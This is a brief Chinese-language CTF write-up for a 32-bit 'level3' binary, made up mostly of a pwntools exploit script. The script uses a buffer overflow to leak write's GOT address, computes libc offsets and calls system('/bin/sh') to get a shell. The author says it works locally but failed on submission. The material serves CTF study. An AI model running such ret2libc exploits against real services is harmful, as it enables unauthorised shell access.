1检查安全机制
图片.png
2.IDA找敏感字符串(没找到),我们想到libc文件或许存在
图片.png
我们利用got和plt的关系,我们可以获取到他的偏移地址。 确定我们的system的地址。
got表和plt:https://blog.csdn.net/qq_18661257/article/details/54694748
EXP
本地测试可以,提交不了
from pwn import*
p = process('./level3')
#p = remote("111.198.29.45"," 31727")
elf = ELF('./level3')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_plt = elf.plt['write']
print "write:" + hex(write_plt)
write_got = elf.got['write']
print "write_got" + hex(write_got)
write_libc = libc.symbols['write']
print "write_libc" + hex(write_libc)
system_libc = libc.symbols['system']
print "system_libc" + hex(system_libc)
vulnerable_function_addr = 0x804844B
p.recv()
payload = 'A' * 140 + p32(write_plt) + p32(vulnerable_function_addr)
payload += p32(1)+ p32(write_got )+ p32(4)
p.sendline(payload)
wirte_addr = u32(p.recv(4))
print "write" + hex(wirte_addr)
pause()
offset = wirte_addr - write_libc
system_addr = offset + system_libc
libc_bin_sh_addr = libc.search("/bin/sh").next()
bin_sh_addr = offset + libc_bin_sh_addr
print "bin_sh_addr " + hex(bin_sh_addr )
payload = 140 * 'A' + p32(system_addr) + p32(vulnerable_function_addr )
payload += p32(bin_sh_addr)
p.sendline(payload)
p.interactive()
